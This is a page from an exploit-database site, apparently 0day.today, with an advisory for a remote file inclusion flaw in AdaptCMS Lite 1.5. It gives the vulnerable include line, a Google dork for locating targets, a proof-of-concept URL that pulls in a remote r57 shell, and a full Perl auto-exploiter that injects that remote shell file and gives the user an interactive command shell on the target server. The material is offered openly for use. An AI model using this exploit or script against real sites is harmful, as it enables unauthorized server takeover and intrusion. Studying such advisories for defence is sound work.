0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
AdaptCMS Lite 1.5 Remote File Inclusion Vulnerability
[=====================================================
AdaptCMS Lite 1.5 Remote File Inclusion Vulnerability
=====================================================
[!] Application : AdaptCMS Lite
[!] Vendor : www.insanevisions.com
[!] Version : 1.5 Other versions may also be affected
[!] Download : http://sourceforge.net/projects/adaptcms/files/
[!] License : Free
[!] Vulnerable : Remote File Inclusion
[!] Google Dork : Copyright 2006-2009 Insane Visions
[o] Description
AdaptCMS is a PHP CMS that is made for complete control of your website,
easiness of use and easily adaptable to any type of website.
It's made easy with advanced custom fields,
a very simple but powerful template system and much more.
Vuln Code & PoC
***************
Vuln: include_once($sitepath."includes/rss/simplepie.inc");
PoC : http://server/plugins/rss_importer_functions.php?sitepath=http://localhost/r57.txt??
AdaptCMS Lite Auto Exploiter
****************************
#!/usr/bin/perl -w
##################################################################
# - register_globals = on #
# - allow_url_include = on #
# - allow_url_fopen = on #
##################################################################
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
use Getopt::Long;
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
}
&clear();
sub banner {
&clear();
print "|---------------------------------------------|\n";
print "| AdaptCMS Lite RFI Auto Injector |\n";
print "|---------------------------------------------|\n\n";
print "Usage:\n";
print " perl $0 -u \"http://target/[path]/\" -fuck \"http://localhost/r57.txt??\"\n\n";
exit();
}
my $options = GetOptions (
'help!' => \$help,
'u=s' => \$u,
'fuck=s' => \$fuck
);
&banner unless ($u);
&banner unless ($fuck);
chomp($u);
chomp($fuck);
while (){
print "[shell]:~\$ ";
chomp($cmd=<STDIN>);
if ($cmd eq "exit" || $cmd eq "quit") {
exit 0;
}
my $ua = LWP::UserAgent->new;
$iny="?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1";
chomp($iny);
my $own = $u . "/plugins/rss_importer_functions.php?sitepath=" . $fuck . $iny;
chomp($own);
my $req = HTTP::Request->new(GET => $own);
my $res = $ua->request($req);
my $con = $res->content;
if ($res->is_success){
print $1,"\n" if ( $con =~ m/readonly> (.*?)\<\/textarea>/mosix);
}
else
{
print "Exploiting failed !!\n";
exit(1);
}
}
# 0day.today [2024-11-15] #